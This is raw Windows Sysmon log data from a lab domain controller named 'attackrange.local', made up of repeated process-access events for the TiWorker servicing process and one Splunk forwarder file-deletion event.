12:02:25.636{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006030Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.636{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006029Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.636{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006028Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.636{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006027Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.636{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006026Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.620{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006025Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.620{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006024Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.620{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006023Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.620{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006022Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.605{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006021Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.605{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006020Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.589{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006019Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.589{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006018Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.589{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 23542300x80000000000000006017Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.589{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A121F05251667D7988C2BA4F75F28D25,SHA256=B4D3C497018AE2C3E2622751C4201E92C8305DCAEBB62DFB19B2730932A25019,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006016Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.574{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006015Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.574{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006014Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.558{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006013Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.558{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e